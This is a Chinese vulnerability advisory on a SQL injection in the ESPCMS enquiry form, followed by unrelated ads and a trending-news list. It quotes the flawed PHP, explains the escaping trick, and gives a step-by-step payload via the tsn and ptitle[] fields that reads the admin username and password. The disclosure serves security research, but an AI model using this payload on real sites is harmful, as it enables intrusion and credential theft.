ESPCMS SQL注入
- 发布时间:2016-08-09
- 公开时间:N/A
- 漏洞类型:SQL注入
- 危害等级:高
- 漏洞编号:xianzhi-2016-08-37542369
- 测试版本:N/A
漏洞详情
interface\special.php 行134起function in_enquirysave() {
……省略部分代码……
$content = trim($this->fun->accept('content', 'P', true, true));
$content = $this->fun->substr($content, 500);
$amount = $this->fun->accept('amount', 'P');
$ptitle = $this->fun->accept('ptitle', 'P');
$tsn = $this->fun->accept('tsn', 'P');
……省略部分代码……
foreach ($did as $key => $value) {
$value = intval($value);
$amount[$key] = intval($amount[$key]);
if ($key == $arraycount) {
$db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$amount[$key],'')";
} else {
$db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$amount[$key],''),";
}
}
$tsn来自$_POST 这里没有判断$tsn是否是一个数组就直接在sql语句中使用了$tsn[$key]
当$tsn是字符串的时候 $tsn[$key]其实取的就是字符串的第$key个字符
当第一次foreach的时候 $did是一个一维数组 $key的值就是0 $tsn[$key]取的就是$tsn的第一个字符
如果我们提交$_POST['tsn']=' 转义后 $tsn="\'" $tsn[0]就变成了"\" 于是sql语句中的单引号就成功被转义了,$ptitle可控 所以造成了注入
网站开放注册会员的前提下 可以直接将注入结果写入title字段在会员中心读取。
网站关闭注册会员的话,也可以直接报错注入或者延时注入。
演示如下
首先随便选一个商品 点击询价 内容随便写 提交的时候抓包拦下来
将tsn字段修改为' 或者\ (任意可被转义的字符)
ptitle[]字段修改为注入代码
,(select concat(username,0x3a,password) from espcms_admin_member limit 1),1,2)#
进入会员中心-》询价列表即可查看注入结果
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 总书记和重庆的故事 4907767
- 2 神十八航天员将在太空养鱼 4914638
- 3 南京市民称骑无牌自行车被罚50元 4899586
- 4 园林圆好梦,耦园成佳偶 4785949
- 5 多所高校学生因悬挂床帘被实名通报 4668858
- 6 11岁双胞胎兄弟失联 河里发现遗体 4575660
- 7 孕妇称收到商家报复快递 警方介入 4466560
- 8 papi酱解读莎士比亚四大喜剧 4380658
- 9 上海辟谣人民广场下面的店全关 4295128
- 10 前京东副总裁蔡磊病情加重 4142816